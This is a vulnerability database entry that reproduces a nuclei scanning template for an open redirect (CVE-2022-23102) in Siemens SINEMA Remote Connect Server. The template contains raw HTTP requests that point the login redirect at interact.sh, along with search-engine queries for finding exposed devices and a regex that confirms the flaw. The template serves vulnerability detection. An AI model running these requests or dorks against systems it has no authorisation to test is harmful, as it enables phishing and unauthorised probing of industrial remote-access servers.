Lucene search
K

SINEMA Remote Connect Server < V2.0 - Open Redirect

🗓️ 04 Jul 2026 03:00:48Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 39 Views

SINEMA Remote Connect Server < V2.0 - Open Redirect. Vulnerability allows attackers to redirect authenticated users to malicious websites, leading to potential phishing attacks

Related
Refs
Code
id: CVE-2022-23102

info:
  name: SINEMA Remote Connect Server < V2.0 - Open Redirect
  author: ctflearner,ritikchaddha
  severity: medium
  description: |
    A vulnerability has been identified in SINEMA Remote Connect Server (All versions < V2.0). Affected products contain an open redirect vulnerability. An attacker could trick a valid authenticated user to the device into clicking a malicious link there by leading to phishing attacks.
  impact: |
    An attacker can exploit this vulnerability to redirect users to malicious websites, leading to potential phishing attacks.
  remediation: |
    Upgrade to SINEMA Remote Connect Server version 2.0 or later to fix the open redirect vulnerability.
  reference:
    - https://nvd.nist.gov/vuln/detail/cve-2022-23102
    - https://packetstormsecurity.com/files/165966/SIEMENS-SINEMA-Remote-Connect-1.0-SP3-HF1-Open-Redirection.html
    - https://seclists.org/fulldisclosure/2022/Feb/20
    - https://cert-portal.siemens.com/productcert/pdf/ssa-654775.pdf
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2022-23102
    cwe-id: CWE-601
    epss-score: 0.05265
    epss-percentile: 0.91553
    cpe: cpe:2.3:a:siemens:sinema_remote_connect_server:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: siemens
    product: sinema_remote_connect_server
    shodan-query:
      - title:"Logon - SINEMA Remote Connect"
      - http.title:"logon - sinema remote connect"
    fofa-query: title="logon - sinema remote connect"
    google-query: intitle:"logon - sinema remote connect"
  tags: cve,cve2022,packetstorm,seclists,redirect,sinema,authenticated,siemens,vuln

http:
  - raw:
      - |
        GET /wbm/login/?next=https%3A%2F%2Finteract.sh HTTP/1.1
        Host: {{Hostname}}
      - |
        POST /wbm/login/?next=https%3A%2F%2Finteract.sh HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Cookie: csrftoken={{csrf}};
        Referer: {{RootURL}}/wbm/login/?next=https%3A%2F%2Finteract.sh

        csrfmiddlewaretoken={{csrf}}&utcoffset=330&username={{username}}&password={{password}}

    matchers:
      - type: regex
        part: header_2
        regex:
          - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$'

    extractors:
      - type: regex
        name: csrf
        part: body
        group: 1
        regex:
          - "name='csrfmiddlewaretoken' value='(.*)' />"
        internal: true
# digest: 490a00463044022063429aef8c46f56117c35dd6e2e2046e76284ba942e30d06c7440908a2006b3602201d9fe95b59706b29529f342be972a7b8bacfff77117dff7aceef0e7f01e20fbe:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.3Medium risk
Vulners AI Score6.3
CVSS 25.8
CVSS 3.16.1
EPSS0.05265
39